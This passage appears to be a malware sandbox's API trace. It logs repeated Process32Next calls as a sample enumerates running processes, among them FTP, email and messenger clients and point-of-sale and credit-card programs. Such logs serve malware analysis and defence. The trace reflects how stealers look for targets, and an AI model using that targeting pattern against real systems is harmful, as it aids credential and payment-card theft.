lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.908] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.910] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.912] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.914] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.916] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.970] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.972] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0233.974] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0233.976] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0233.978] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.983] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0233.985] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0233.987] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0233.989] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0233.991] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0233.993] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0233.999] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0234.001] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0234.003] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0234.005] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0234.007] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0234.009] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0234.034] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0234.035] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0234.037] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0234.038] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0234.039] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0234.041] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0234.045] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0234.047] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0234.048] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0234.050] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0234.051] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0234.052] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0234.054] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0234.055] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0234.056] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0234.062] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0234.063] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0234.065] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0234.067] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0234.068] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0234.070] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0234.071] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0234.104] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0234.109] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0234.111] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0234.113] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0234.114] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0234.116] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0234.118] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0234.120] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0234.124] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0234.125] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0234.127] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0234.128] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0234.130] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0234.132] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0234.133] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0234.135] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0234.140] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0234.141] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0234.143] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0234.144] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0234.146] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0234.147] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0234.149] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0234.150] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0234.202] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0234.204] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0234.205] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0234.207] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0234.209] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0234.210] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0234.212] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0234.213] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0234.218] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0234.220] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0234.222] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0234.223] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0234.225] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0234.227] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0234.229] Process32Next (in: hSnapshot=0x1b08, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 